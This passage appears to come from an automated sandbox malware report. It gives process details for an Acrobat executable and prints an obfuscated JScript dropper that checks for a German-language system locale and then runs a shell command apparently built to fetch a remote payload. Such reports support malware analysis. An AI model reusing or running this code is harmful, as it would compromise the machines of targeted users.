Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6413e0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function tcwum() { |
|
1 | zazayzigs = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var jowuziq = this[bluorlqjp + lukbrwlan + yhsqm + vrcsmd + sbsryon + orcjd + bcfkjth + boodn] ( this[etefbq + gfplbai + tdkmtvnu + yhsqm + klujfxyj + bluorlqjp + boodn][xqnxssrjy + yhsqm + sbsryon + lukbrwlan + boodn + sbsryon + urbswsj + itgxrpxva + shtwml + sbsryon + tdkmtvnu + boodn] ( etefbq + gfplbai + tdkmtvnu + yhsqm + klujfxyj + bluorlqjp + boodn + lpjzqlrfg + gfplbai + dyvqarz + sbsryon + oqnolkag + oqnolkag ) [mmesgd + sbsryon + eyuoikhm + mmesgd + sbsryon + lukbrwlan + bqyju] ( ankvk + ixxwm + nqrpvs + dslibftd + kkcrikjs + xqnxssrjy + scitxx + mmesgd + mmesgd + nqrpvs + qxophnueq + aumotflq + kkcrikjs + scitxx + gfplbai + nqrpvs + mmesgd + oiykxjmtf + xqnxssrjy + pcjgu + bcfkjth + boodn + yhsqm + pcjgu + oqnolkag + uvyaofk + moedwes + lukbrwlan + bcfkjth + sbsryon + oqnolkag + oiykxjmtf + orcjd + bcfkjth + boodn + sbsryon + yhsqm + bcfkjth + lukbrwlan + boodn + klujfxyj + pcjgu + bcfkjth + lukbrwlan + oqnolkag + oiykxjmtf + pnkdy + pcjgu + tdkmtvnu + lukbrwlan + oqnolkag + sbsryon ), 16 ); |
|
3 | for ( uuxtkyul = 0 ; uuxtkyul < zazayzigs[oqnolkag + sbsryon + bcfkjth + eyuoikhm + boodn + dyvqarz] ; ++ uuxtkyul ) | |
4 | { | |
5 | if ( jowuziq == zazayzigs[uuxtkyul] ) | |
6 | { | |
7 | jowuziq = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( jowuziq !== true ) | |
12 | this[etefbq + gfplbai + tdkmtvnu + yhsqm + klujfxyj + bluorlqjp + boodn][wkctsp + euxsck + klujfxyj + boodn] ( ); | |
13 | this[etefbq + gfplbai + tdkmtvnu + yhsqm + klujfxyj + bluorlqjp + boodn][xqnxssrjy + yhsqm + sbsryon + lukbrwlan + boodn + sbsryon + urbswsj + itgxrpxva + shtwml + sbsryon + tdkmtvnu + boodn] ( etefbq + gfplbai + tdkmtvnu + yhsqm + klujfxyj + bluorlqjp + boodn + lpjzqlrfg + gfplbai + dyvqarz + sbsryon + oqnolkag + oqnolkag ) [yhsqm + euxsck + bcfkjth] ( tdkmtvnu + oivwkh + bqyju + uvyaofk + qvbbsoqk + tdkmtvnu + uvyaofk + bluorlqjp + pcjgu + teookekc + sbsryon + yhsqm + vrcsmd + dyvqarz + sbsryon + oqnolkag + oqnolkag + lpjzqlrfg + sbsryon + qnokgvb + sbsryon + uvyaofk + gqixh + xqnxssrjy + pcjgu + oivwkh + oivwkh + lukbrwlan + bcfkjth + bqyju + uvyaofk + tlgzqr + orcjd + bcfkjth + moggbzpa + pcjgu + qfqaefol + sbsryon + gqixh + etefbq + sbsryon + itgxrpxva + mmesgd + sbsryon + auvfgcj + euxsck + sbsryon + vrcsmd + boodn + uvyaofk + gqixh + urbswsj + euxsck + boodn + nzfze + klujfxyj + oqnolkag + sbsryon + uvyaofk + wapywn + boodn + sbsryon + oivwkh + bluorlqjp + wapywn + oiykxjmtf + klujfxyj + bcfkjth + moggbzpa + pcjgu + klujfxyj + tdkmtvnu + sbsryon + lpjzqlrfg + bluorlqjp + bqyju + uvmpkuc + uvyaofk + dyvqarz + boodn + boodn + bluorlqjp + fmabzj + qvbbsoqk + qvbbsoqk + lccgnxiz + fwbbo + qjobpw + lpjzqlrfg + lccgnxiz + ebeochxxp + qjobpw + lpjzqlrfg + lccgnxiz + lpjzqlrfg + wsjqj + ymlclrm + tgydr + qvbbsoqk + klujfxyj + bcfkjth + moggbzpa + pcjgu + klujfxyj + tdkmtvnu + sbsryon + lpjzqlrfg + bluorlqjp + dyvqarz + bluorlqjp + tlgzqr + esbhj + esbhj + vrcsmd + boodn + lukbrwlan + yhsqm + boodn + uvyaofk + wapywn + boodn + sbsryon + oivwkh + bluorlqjp + wapywn + oiykxjmtf + klujfxyj + bcfkjth + moggbzpa + pcjgu + klujfxyj + tdkmtvnu + sbsryon + lpjzqlrfg + bluorlqjp + bqyju + uvmpkuc + esbhj + esbhj + tdkmtvnu + oivwkh + bqyju + uvyaofk + qvbbsoqk + tdkmtvnu + uvyaofk + bcfkjth + sbsryon + boodn + uvyaofk + euxsck + vrcsmd + sbsryon + uvyaofk + oiykxjmtf + oiykxjmtf + lccgnxiz + fwbbo + qjobpw + lpjzqlrfg + lccgnxiz + ebeochxxp + qjobpw + lpjzqlrfg + lccgnxiz + lpjzqlrfg + wsjqj + ymlclrm + tgydr + udnvo + ahtzkg + ahtzkg + ahtzkg + ahtzkg + oiykxjmtf + bqyju + lukbrwlan + moggbzpa + teookekc + teookekc + teookekc + yhsqm + pcjgu + pcjgu + boodn + oiykxjmtf + esbhj + esbhj + tdkmtvnu + oivwkh + bqyju + uvyaofk + qvbbsoqk + tdkmtvnu + uvyaofk + yhsqm + sbsryon + eyuoikhm + vrcsmd + moggbzpa + yhsqm + qjobpw + wsjqj + uvyaofk + qvbbsoqk + vrcsmd + uvyaofk + oiykxjmtf + oiykxjmtf + lccgnxiz + fwbbo + qjobpw + lpjzqlrfg + lccgnxiz + ebeochxxp + qjobpw + lpjzqlrfg + lccgnxiz + lpjzqlrfg + wsjqj + ymlclrm + tgydr + udnvo + ahtzkg + ahtzkg + ahtzkg + ahtzkg + oiykxjmtf + bqyju + lukbrwlan + moggbzpa + teookekc + teookekc + teookekc + yhsqm + pcjgu + pcjgu + boodn + oiykxjmtf + wsjqj + wsjqj + fwbbo + ymlclrm + ebeochxxp + wsjqj + heqpuupj + fwbbo + wsjqj + qjobpw + wsjqj + lccgnxiz + ymlclrm + ahtzkg + tgydr + lpjzqlrfg + bqyju + oqnolkag + oqnolkag, 0, false ); |
|
14 | } | |
15 | ahtzkg = "p"; | |
16 | ahtzkg = "z"; | |
17 | ahtzkg = "C"; | |
18 | ahtzkg = "b"; | |
19 | ahtzkg = "P"; | |
20 | ahtzkg = "M"; | |
21 | ahtzkg = "z"; | |
22 | ahtzkg = "S"; | |
23 | ahtzkg = "y"; | |
24 | ahtzkg = "l"; | |
25 | ahtzkg = "K"; | |
26 | ahtzkg = "U"; | |
27 | ahtzkg = "a"; | |
28 | ahtzkg = "F"; | |
29 | ahtzkg = "X"; | |
30 | ahtzkg = "k"; | |
31 | ahtzkg = "h"; | |
32 | ahtzkg = "i"; | |
33 | ahtzkg = "q"; | |
34 | ahtzkg = "G"; | |
35 | ahtzkg = "G"; | |
36 | ahtzkg = "G"; | |
37 | ahtzkg = "T"; | |
38 | ahtzkg = "L"; | |
39 | ahtzkg = "m"; | |
40 | ahtzkg = "N"; | |
41 | ahtzkg = "f"; | |
42 | ahtzkg = "y"; | |
43 | ahtzkg = "Z"; | |
44 | ahtzkg = "F"; | |
45 | ahtzkg = "O"; | |
46 | ahtzkg = "W"; | |
47 | ahtzkg = "D"; | |
48 | ahtzkg = "v"; | |
49 | ahtzkg = "u"; | |
50 | ahtzkg = "H"; | |
51 | ahtzkg = "8"; | |
52 | udnvo = "g"; | |
53 | udnvo = "N"; | |
54 | udnvo = "q"; | |
55 | udnvo = "w"; | |
56 | udnvo = "Z"; | |
57 | udnvo = "D"; | |
58 | udnvo = "O"; | |
59 | udnvo = "z"; | |
60 | udnvo = "f"; | |
61 | udnvo = "S"; | |
62 | udnvo = "D"; | |
63 | udnvo = "p"; | |
64 | udnvo = "p"; | |
65 | udnvo = "U"; | |
66 | udnvo = "o"; | |
67 | udnvo = "Q"; | |
68 | udnvo = "L"; | |
69 | udnvo = "U"; | |
70 | udnvo = "a"; | |
71 | udnvo = "@"; | |
72 | lukbrwlan = "h"; | |
73 | lukbrwlan = "Z"; | |
74 | lukbrwlan = "s"; | |
75 | lukbrwlan = "G"; | |
76 | lukbrwlan = "c"; | |
77 | lukbrwlan = "V"; | |
78 | lukbrwlan = "w"; | |
79 | lukbrwlan = "F"; | |
80 | lukbrwlan = "D"; | |
81 | lukbrwlan = "W"; | |
82 | lukbrwlan = "O"; | |
83 | lukbrwlan = "d"; | |
84 | lukbrwlan = "d"; | |
85 | lukbrwlan = "F"; | |
86 | lukbrwlan = "w"; | |
87 | lukbrwlan = "R"; | |
88 | lukbrwlan = "F"; | |
89 | lukbrwlan = "N"; | |
90 | lukbrwlan = "q"; | |
91 | lukbrwlan = "W"; | |
92 | lukbrwlan = "w"; | |
93 | lukbrwlan = "m"; | |
94 | lukbrwlan = "R"; | |
95 | lukbrwlan = "W"; | |
96 | lukbrwlan = "o"; | |
97 | lukbrwlan = "V"; | |
98 | lukbrwlan = "O"; | |
99 | lukbrwlan = "F"; | |
100 | lukbrwlan = "H"; | |
101 | lukbrwlan = "m"; | |
102 | lukbrwlan = "O"; | |
103 | lukbrwlan = "X"; | |
104 | lukbrwlan = "U"; | |
105 | lukbrwlan = "L"; | |
106 | lukbrwlan = "F"; | |
107 | lukbrwlan = "a"; | |
108 | boodn = "T"; | |
109 | boodn = "W"; | |
110 | boodn = "g"; | |
111 | boodn = "o"; | |
112 | boodn = "W"; | |
113 | boodn = "e"; | |
114 | boodn = "r"; | |
115 | boodn = "L"; | |
116 | boodn = "N"; | |
117 | boodn = "h"; | |
118 | boodn = "C"; | |
119 | boodn = "z"; | |
120 | boodn = "I"; | |
121 | boodn = "q"; | |
122 | boodn = "o"; | |
123 | boodn = "n"; | |
124 | boodn = "j"; | |
125 | boodn = "W"; | |
126 | boodn = "z"; | |
127 | boodn = "z"; | |
128 | boodn = "R"; | |
129 | boodn = "g"; | |
130 | boodn = "z"; | |
131 | boodn = "g"; | |
132 | boodn = "e"; | |
133 | boodn = "f"; | |
134 | boodn = "C"; | |
135 | boodn = "f"; | |
136 | boodn = "M"; | |
137 | boodn = "D"; | |
138 | boodn = "c"; | |
139 | boodn = "n"; | |
140 | boodn = "Z"; | |
141 | boodn = "Y"; | |
142 | boodn = "S"; | |
143 | boodn = "x"; | |
144 | boodn = "Y"; | |
145 | boodn = "M"; | |
146 | boodn = "y"; | |
147 | boodn = "e"; | |
148 | boodn = "R"; | |
149 | boodn = "k"; | |
150 | boodn = "r"; | |
151 | boodn = "t"; | |
152 | gfplbai = "n"; | |
153 | gfplbai = "I"; | |
154 | gfplbai = "E"; | |
155 | gfplbai = "h"; | |
156 | gfplbai = "v"; | |
157 | gfplbai = "L"; | |
158 | gfplbai = "o"; | |
159 | gfplbai = "o"; | |
160 | gfplbai = "H"; | |
161 | gfplbai = "r"; | |
162 | gfplbai = "y"; | |
163 | gfplbai = "d"; | |
164 | gfplbai = "Z"; | |
165 | gfplbai = "w"; | |
166 | gfplbai = "o"; | |
167 | gfplbai = "D"; | |
168 | gfplbai = "y"; | |
169 | gfplbai = "v"; | |
170 | gfplbai = "G"; | |
171 | gfplbai = "g"; | |
172 | gfplbai = "b"; | |
173 | gfplbai = "h"; | |
174 | gfplbai = "w"; | |
175 | gfplbai = "V"; | |
176 | gfplbai = "k"; | |
177 | gfplbai = "S"; | |
178 | moedwes = "d"; | |
179 | moedwes = "j"; | |
180 | moedwes = "f"; | |
181 | moedwes = "f"; | |
182 | moedwes = "v"; | |
183 | moedwes = "Y"; | |
184 | moedwes = "S"; | |
185 | moedwes = "J"; | |
186 | moedwes = "l"; | |
187 | moedwes = "S"; | |
188 | moedwes = "W"; | |
189 | moedwes = "K"; | |
190 | moedwes = "Z"; | |
191 | moedwes = "n"; | |
192 | moedwes = "G"; | |
193 | moedwes = "P"; | |
194 | fmabzj = "W"; | |
195 | fmabzj = "b"; | |
196 | fmabzj = "J"; | |
197 | fmabzj = "i"; | |
198 | fmabzj = "V"; | |
199 | fmabzj = "h"; | |
200 | fmabzj = "g"; | |
201 | fmabzj = "M"; | |
202 | fmabzj = ":"; | |
203 | mmesgd = "o"; | |
204 | mmesgd = "w"; | |
205 | mmesgd = "J"; | |
206 | mmesgd = "L"; | |
207 | mmesgd = "H"; | |
208 | mmesgd = "M"; | |
209 | mmesgd = "R"; | |
210 | mmesgd = "m"; | |
211 | mmesgd = "O"; | |
212 | mmesgd = "h"; | |
213 | mmesgd = "R"; | |
214 | wapywn = "k"; | |
215 | wapywn = "j"; | |
216 | wapywn = "P"; | |
217 | wapywn = "f"; | |
218 | wapywn = "o"; | |
219 | wapywn = "z"; | |
220 | wapywn = "F"; | |
221 | wapywn = "p"; | |
222 | wapywn = "C"; | |
223 | wapywn = "n"; | |
224 | wapywn = "N"; | |
225 | wapywn = "y"; | |
226 | wapywn = "H"; | |
227 | wapywn = "N"; | |
228 | wapywn = "n"; | |
229 | wapywn = "q"; | |
230 | wapywn = "j"; | |
231 | wapywn = "y"; | |
232 | wapywn = "Q"; | |
233 | wapywn = "C"; | |
234 | wapywn = "F"; | |
235 | wapywn = "w"; | |
236 | wapywn = "G"; | |
237 | wapywn = "W"; | |
238 | wapywn = "s"; | |
239 | wapywn = "W"; | |
240 | wapywn = "L"; | |
241 | wapywn = "P"; | |
242 | wapywn = "X"; | |
243 | wapywn = "h"; | |
244 | wapywn = "P"; | |
245 | wapywn = "E"; | |
246 | wapywn = "M"; | |
247 | wapywn = "v"; | |
248 | wapywn = "%"; | |
249 | aumotflq = "f"; | |
250 | aumotflq = "y"; | |
251 | aumotflq = "r"; | |
252 | aumotflq = "E"; | |
253 | aumotflq = "X"; | |
254 | aumotflq = "f"; | |
255 | aumotflq = "n"; | |
256 | aumotflq = "X"; | |
257 | aumotflq = "V"; | |
258 | aumotflq = "u"; | |
259 | aumotflq = "m"; | |
260 | aumotflq = "k"; | |
261 | aumotflq = "H"; | |
262 | aumotflq = "V"; | |
263 | aumotflq = "b"; | |
264 | aumotflq = "k"; | |
265 | aumotflq = "X"; | |
266 | aumotflq = "G"; | |
267 | aumotflq = "C"; | |
268 | aumotflq = "A"; | |
269 | aumotflq = "L"; | |
270 | aumotflq = "V"; | |
271 | aumotflq = "X"; | |
272 | aumotflq = "x"; | |
273 | aumotflq = "Y"; | |
274 | aumotflq = "C"; | |
275 | aumotflq = "e"; | |
276 | aumotflq = "x"; | |
277 | aumotflq = "z"; | |
278 | aumotflq = "y"; | |
279 | aumotflq = "A"; | |
280 | aumotflq = "q"; | |
281 | aumotflq = "V"; | |
282 | aumotflq = "O"; | |
283 | aumotflq = "v"; | |
284 | aumotflq = "n"; | |
285 | aumotflq = "M"; | |
286 | aumotflq = "T"; | |
287 | qvbbsoqk = "C"; | |
288 | qvbbsoqk = "o"; | |
289 | qvbbsoqk = "D"; | |
290 | qvbbsoqk = "o"; | |
291 | qvbbsoqk = "E"; | |
292 | qvbbsoqk = "y"; | |
293 | qvbbsoqk = "o"; | |
294 | qvbbsoqk = "k"; | |
295 | qvbbsoqk = "W"; | |
296 | qvbbsoqk = "a"; | |
297 | qvbbsoqk = "W"; | |
298 | qvbbsoqk = "J"; | |
299 | qvbbsoqk = "m"; | |
300 | qvbbsoqk = "I"; | |
301 | qvbbsoqk = "w"; | |
302 | qvbbsoqk = "b"; | |
303 | qvbbsoqk = "i"; | |
304 | qvbbsoqk = "z"; | |
305 | qvbbsoqk = "f"; | |
306 | qvbbsoqk = "l"; | |
307 | qvbbsoqk = "J"; | |
308 | qvbbsoqk = "i"; | |
309 | qvbbsoqk = "H"; | |
310 | qvbbsoqk = "u"; | |
311 | qvbbsoqk = "R"; | |
312 | qvbbsoqk = "N"; | |
313 | qvbbsoqk = "b"; | |
314 | qvbbsoqk = "Z"; | |
315 | qvbbsoqk = "W"; | |
316 | qvbbsoqk = "n"; | |
317 | qvbbsoqk = "Z"; | |
318 | qvbbsoqk = "a"; | |
319 | qvbbsoqk = "r"; | |
320 | qvbbsoqk = "Y"; | |
321 | qvbbsoqk = "V"; | |
322 | qvbbsoqk = "I"; | |
323 | qvbbsoqk = "Q"; | |
324 | qvbbsoqk = "X"; | |
325 | qvbbsoqk = "v"; | |
326 | qvbbsoqk = "f"; | |
327 | qvbbsoqk = "E"; | |
328 | qvbbsoqk = "o"; | |
329 | qvbbsoqk = "/"; | |
330 | oqnolkag = "P"; | |
331 | oqnolkag = "k"; | |
332 | oqnolkag = "t"; | |
333 | oqnolkag = "C"; | |
334 | oqnolkag = "n"; | |
335 | oqnolkag = "T"; | |
336 | oqnolkag = "t"; | |
337 | oqnolkag = "Q"; | |
338 | oqnolkag = "d"; | |
339 | oqnolkag = "I"; | |
340 | oqnolkag = "r"; | |
341 | oqnolkag = "y"; | |
342 | oqnolkag = "K"; | |
343 | oqnolkag = "g"; | |
344 | oqnolkag = "i"; | |
345 | oqnolkag = "H"; | |
346 | oqnolkag = "n"; | |
347 | oqnolkag = "l"; | |
348 | kkcrikjs = "p"; | |
349 | kkcrikjs = "P"; | |
350 | kkcrikjs = "E"; | |
351 | kkcrikjs = "Z"; | |
352 | kkcrikjs = "s"; | |
353 | kkcrikjs = "j"; | |
354 | kkcrikjs = "F"; | |
355 | kkcrikjs = "i"; | |
356 | kkcrikjs = "I"; | |
357 | kkcrikjs = "b"; | |
358 | kkcrikjs = "z"; | |
359 | kkcrikjs = "E"; | |
360 | kkcrikjs = "S"; | |
361 | kkcrikjs = "S"; | |
362 | kkcrikjs = "f"; | |
363 | kkcrikjs = "P"; | |
364 | kkcrikjs = "T"; | |
365 | kkcrikjs = "J"; | |
366 | kkcrikjs = "y"; | |
367 | kkcrikjs = "C"; | |
368 | kkcrikjs = "s"; | |
369 | kkcrikjs = "w"; | |
370 | kkcrikjs = "k"; | |
371 | kkcrikjs = "B"; | |
372 | kkcrikjs = "J"; | |
373 | kkcrikjs = "X"; | |
374 | kkcrikjs = "x"; | |
375 | kkcrikjs = "s"; | |
376 | kkcrikjs = "W"; | |
377 | kkcrikjs = "h"; | |
378 | kkcrikjs = "j"; | |
379 | kkcrikjs = "y"; | |
380 | kkcrikjs = "X"; | |
381 | kkcrikjs = "W"; | |
382 | kkcrikjs = "H"; | |
383 | kkcrikjs = "q"; | |
384 | kkcrikjs = "r"; | |
385 | kkcrikjs = "r"; | |
386 | kkcrikjs = "z"; | |
387 | kkcrikjs = "n"; | |
388 | kkcrikjs = "O"; | |
389 | kkcrikjs = "_"; | |
390 | xqnxssrjy = "t"; | |
391 | xqnxssrjy = "Q"; | |
392 | xqnxssrjy = "g"; | |
393 | xqnxssrjy = "i"; | |
394 | xqnxssrjy = "v"; | |
395 | xqnxssrjy = "d"; | |
396 | xqnxssrjy = "s"; | |
397 | xqnxssrjy = "v"; | |
398 | xqnxssrjy = "d"; | |
399 | xqnxssrjy = "u"; | |
400 | xqnxssrjy = "u"; | |
401 | xqnxssrjy = "c"; | |
402 | xqnxssrjy = "Q"; | |
403 | xqnxssrjy = "s"; | |
404 | xqnxssrjy = "H"; | |
405 | xqnxssrjy = "T"; | |
406 | xqnxssrjy = "r"; | |
407 | xqnxssrjy = "v"; | |
408 | xqnxssrjy = "T"; | |
409 | xqnxssrjy = "i"; | |
410 | xqnxssrjy = "Y"; | |
411 | xqnxssrjy = "Q"; | |
412 | xqnxssrjy = "U"; | |
413 | xqnxssrjy = "z"; | |
414 | xqnxssrjy = "U"; | |
415 | xqnxssrjy = "E"; | |
416 | xqnxssrjy = "W"; | |
417 | xqnxssrjy = "C"; | |
418 | dyvqarz = "l"; | |
419 | dyvqarz = "r"; | |
420 | dyvqarz = "b"; | |
421 | dyvqarz = "f"; | |
422 | dyvqarz = "p"; | |
423 | dyvqarz = "a"; | |
424 | dyvqarz = "R"; | |
425 | dyvqarz = "h"; | |
426 | shtwml = "E"; | |
427 | shtwml = "R"; | |
428 | shtwml = "S"; | |
429 | shtwml = "I"; | |
430 | shtwml = "R"; | |
431 | shtwml = "l"; | |
432 | shtwml = "S"; | |
433 | shtwml = "M"; | |
434 | shtwml = "X"; | |
435 | shtwml = "V"; | |
436 | shtwml = "i"; | |
437 | shtwml = "d"; | |
438 | shtwml = "k"; | |
439 | shtwml = "F"; | |
440 | shtwml = "B"; | |
441 | shtwml = "L"; | |
442 | shtwml = "X"; | |
443 | shtwml = "j"; | |
444 | fwbbo = "O"; | |
445 | fwbbo = "S"; | |
446 | fwbbo = "P"; | |
447 | fwbbo = "W"; | |
448 | fwbbo = "A"; | |
449 | fwbbo = "Y"; | |
450 | fwbbo = "p"; | |
451 | fwbbo = "Q"; | |
452 | fwbbo = "n"; | |
453 | fwbbo = "N"; | |
454 | fwbbo = "W"; | |
455 | fwbbo = "v"; | |
456 | fwbbo = "W"; | |
457 | fwbbo = "O"; | |
458 | fwbbo = "x"; | |
459 | fwbbo = "e"; | |
460 | fwbbo = "T"; | |
461 | fwbbo = "t"; | |
462 | fwbbo = "9"; | |
463 | wkctsp = "K"; | |
464 | wkctsp = "n"; | |
465 | wkctsp = "l"; | |
466 | wkctsp = "S"; | |
467 | wkctsp = "H"; | |
468 | wkctsp = "N"; | |
469 | wkctsp = "S"; | |
470 | wkctsp = "g"; | |
471 | wkctsp = "b"; | |
472 | wkctsp = "Y"; | |
473 | wkctsp = "L"; | |
474 | wkctsp = "i"; | |
475 | wkctsp = "R"; | |
476 | wkctsp = "x"; | |
477 | wkctsp = "j"; | |
478 | wkctsp = "T"; | |
479 | wkctsp = "P"; | |
480 | wkctsp = "U"; | |
481 | wkctsp = "d"; | |
482 | wkctsp = "Y"; | |
483 | wkctsp = "z"; | |
484 | wkctsp = "x"; | |
485 | wkctsp = "y"; | |
486 | wkctsp = "I"; | |
487 | wkctsp = "k"; | |
488 | wkctsp = "e"; | |
489 | wkctsp = "D"; | |
490 | wkctsp = "W"; | |
491 | wkctsp = "p"; | |
492 | wkctsp = "x"; | |
493 | wkctsp = "I"; | |
494 | wkctsp = "d"; | |
495 | wkctsp = "F"; | |
496 | wkctsp = "n"; | |
497 | wkctsp = "U"; | |
498 | wkctsp = "f"; | |
499 | wkctsp = "U"; | |
500 | wkctsp = "U"; | |
501 | wkctsp = "y"; | |
502 | wkctsp = "Q"; | |
503 | orcjd = "a"; | |
504 | orcjd = "k"; | |
505 | orcjd = "r"; | |
506 | orcjd = "d"; | |
507 | orcjd = "B"; | |
508 | orcjd = "t"; | |
509 | orcjd = "I"; | |
510 | orcjd = "P"; | |
511 | orcjd = "C"; | |
512 | orcjd = "d"; | |
513 | orcjd = "K"; | |
514 | orcjd = "W"; | |
515 | orcjd = "j"; | |
516 | orcjd = "U"; | |
517 | orcjd = "X"; | |
518 | orcjd = "u"; | |
519 | orcjd = "I"; | |
520 | orcjd = "J"; | |
521 | orcjd = "l"; | |
522 | orcjd = "I"; | |
523 | teookekc = "l"; | |
524 | teookekc = "M"; | |
525 | teookekc = "T"; | |
526 | teookekc = "N"; | |
527 | teookekc = "T"; | |
528 | teookekc = "K"; | |
529 | teookekc = "s"; | |
530 | teookekc = "h"; | |
531 | teookekc = "V"; | |
532 | teookekc = "c"; | |
533 | teookekc = "D"; | |
534 | teookekc = "H"; | |
535 | teookekc = "I"; | |
536 | teookekc = "F"; | |
537 | teookekc = "g"; | |
538 | teookekc = "U"; | |
539 | teookekc = "H"; | |
540 | teookekc = "q"; | |
541 | teookekc = "Y"; | |
542 | teookekc = "P"; | |
543 | teookekc = "V"; | |
544 | teookekc = "A"; | |
545 | teookekc = "H"; | |
546 | teookekc = "q"; | |
547 | teookekc = "Y"; | |
548 | teookekc = "R"; | |
549 | teookekc = "Q"; | |
550 | teookekc = "r"; | |
551 | teookekc = "u"; | |
552 | teookekc = "b"; | |
553 | teookekc = "z"; | |
554 | teookekc = "N"; | |
555 | teookekc = "c"; | |
556 | teookekc = "d"; | |
557 | teookekc = "w"; | |
558 | oiykxjmtf = "e"; | |
559 | oiykxjmtf = "S"; | |
560 | oiykxjmtf = "I"; | |
561 | oiykxjmtf = "g"; | |
562 | oiykxjmtf = "i"; | |
563 | oiykxjmtf = "\\"; | |
564 | bcfkjth = "N"; | |
565 | bcfkjth = "w"; | |
566 | bcfkjth = "M"; | |
567 | bcfkjth = "v"; | |
568 | bcfkjth = "T"; | |
569 | bcfkjth = "W"; | |
570 | bcfkjth = "U"; | |
571 | bcfkjth = "F"; | |
572 | bcfkjth = "z"; | |
573 | bcfkjth = "X"; | |
574 | bcfkjth = "f"; | |
575 | bcfkjth = "S"; | |
576 | bcfkjth = "C"; | |
577 | bcfkjth = "b"; | |
578 | bcfkjth = "z"; | |
579 | bcfkjth = "X"; | |
580 | bcfkjth = "k"; | |
581 | bcfkjth = "Y"; | |
582 | bcfkjth = "T"; | |
583 | bcfkjth = "A"; | |
584 | bcfkjth = "c"; | |
585 | bcfkjth = "d"; | |
586 | bcfkjth = "Y"; | |
587 | bcfkjth = "b"; | |
588 | bcfkjth = "w"; | |
589 | bcfkjth = "o"; | |
590 | bcfkjth = "C"; | |
591 | bcfkjth = "n"; | |
592 | sbsryon = "E"; | |
593 | sbsryon = "s"; | |
594 | sbsryon = "a"; | |
595 | sbsryon = "e"; | |
596 | sbsryon = "L"; | |
597 | sbsryon = "W"; | |
598 | sbsryon = "Y"; | |
599 | sbsryon = "C"; | |
600 | sbsryon = "x"; | |
601 | sbsryon = "A"; | |
602 | sbsryon = "X"; | |
603 | sbsryon = "y"; | |
604 | sbsryon = "f"; | |
605 | sbsryon = "d"; | |
606 | sbsryon = "g"; | |
607 | sbsryon = "T"; | |
608 | sbsryon = "d"; | |
609 | sbsryon = "m"; | |
610 | sbsryon = "C"; | |
611 | sbsryon = "L"; | |
612 | sbsryon = "k"; | |
613 | sbsryon = "B"; | |
614 | sbsryon = "l"; | |
615 | sbsryon = "N"; | |
616 | sbsryon = "Z"; | |
617 | sbsryon = "u"; | |
618 | sbsryon = "f"; | |
619 | sbsryon = "H"; | |
620 | sbsryon = "M"; | |
621 | sbsryon = "S"; | |
622 | sbsryon = "e"; | |
623 | vrcsmd = "t"; | |
624 | vrcsmd = "k"; | |
625 | vrcsmd = "e"; | |
626 | vrcsmd = "T"; | |
627 | vrcsmd = "Z"; | |
628 | vrcsmd = "m"; | |
629 | vrcsmd = "T"; | |
630 | vrcsmd = "S"; | |
631 | vrcsmd = "m"; | |
632 | vrcsmd = "v"; | |
633 | vrcsmd = "u"; | |
634 | vrcsmd = "h"; | |
635 | vrcsmd = "N"; | |
636 | vrcsmd = "e"; | |
637 | vrcsmd = "v"; | |
638 | vrcsmd = "q"; | |
639 | vrcsmd = "A"; | |
640 | vrcsmd = "G"; | |
641 | vrcsmd = "f"; | |
642 | vrcsmd = "j"; | |
643 | vrcsmd = "q"; | |
644 | vrcsmd = "s"; | |
645 | qjobpw = "k"; | |
646 | qjobpw = "J"; | |
647 | qjobpw = "x"; | |
648 | qjobpw = "z"; | |
649 | qjobpw = "K"; | |
650 | qjobpw = "j"; | |
651 | qjobpw = "R"; | |
652 | qjobpw = "l"; | |
653 | qjobpw = "n"; | |
654 | qjobpw = "o"; | |
655 | qjobpw = "i"; | |
656 | qjobpw = "a"; | |
657 | qjobpw = "3"; | |
658 | itgxrpxva = "I"; | |
659 | itgxrpxva = "C"; | |
660 | itgxrpxva = "D"; | |
661 | itgxrpxva = "W"; | |
662 | itgxrpxva = "b"; | |
663 | gqixh = "P"; | |
664 | gqixh = "K"; | |
665 | gqixh = "N"; | |
666 | gqixh = "I"; | |
667 | gqixh = "o"; | |
668 | gqixh = "-"; | |
669 | lccgnxiz = "w"; | |
670 | lccgnxiz = "H"; | |
671 | lccgnxiz = "H"; | |
672 | lccgnxiz = "O"; | |
673 | lccgnxiz = "Q"; | |
674 | lccgnxiz = "s"; | |
675 | lccgnxiz = "1"; | |
676 | klujfxyj = "J"; | |
677 | klujfxyj = "p"; | |
678 | klujfxyj = "B"; | |
679 | klujfxyj = "C"; | |
680 | klujfxyj = "v"; | |
681 | klujfxyj = "t"; | |
682 | klujfxyj = "g"; | |
683 | klujfxyj = "B"; | |
684 | klujfxyj = "h"; | |
685 | klujfxyj = "J"; | |
686 | klujfxyj = "E"; | |
687 | klujfxyj = "T"; | |
688 | klujfxyj = "x"; | |
689 | klujfxyj = "k"; | |
690 | klujfxyj = "i"; | |
691 | klujfxyj = "d"; | |
692 | klujfxyj = "E"; | |
693 | klujfxyj = "u"; | |
694 | klujfxyj = "o"; | |
695 | klujfxyj = "s"; | |
696 | klujfxyj = "E"; | |
697 | klujfxyj = "U"; | |
698 | klujfxyj = "I"; | |
699 | klujfxyj = "s"; | |
700 | klujfxyj = "P"; | |
701 | klujfxyj = "F"; | |
702 | klujfxyj = "B"; | |
703 | klujfxyj = "q"; | |
704 | klujfxyj = "t"; | |
705 | klujfxyj = "I"; | |
706 | klujfxyj = "P"; | |
707 | klujfxyj = "T"; | |
708 | klujfxyj = "n"; | |
709 | klujfxyj = "H"; | |
710 | klujfxyj = "Q"; | |
711 | klujfxyj = "g"; | |
712 | klujfxyj = "U"; | |
713 | klujfxyj = "p"; | |
714 | klujfxyj = "c"; | |
715 | klujfxyj = "R"; | |
716 | klujfxyj = "O"; | |
717 | klujfxyj = "U"; | |
718 | klujfxyj = "N"; | |
719 | klujfxyj = "i"; | |
720 | tdkmtvnu = "v"; | |
721 | tdkmtvnu = "u"; | |
722 | tdkmtvnu = "Y"; | |
723 | tdkmtvnu = "E"; | |
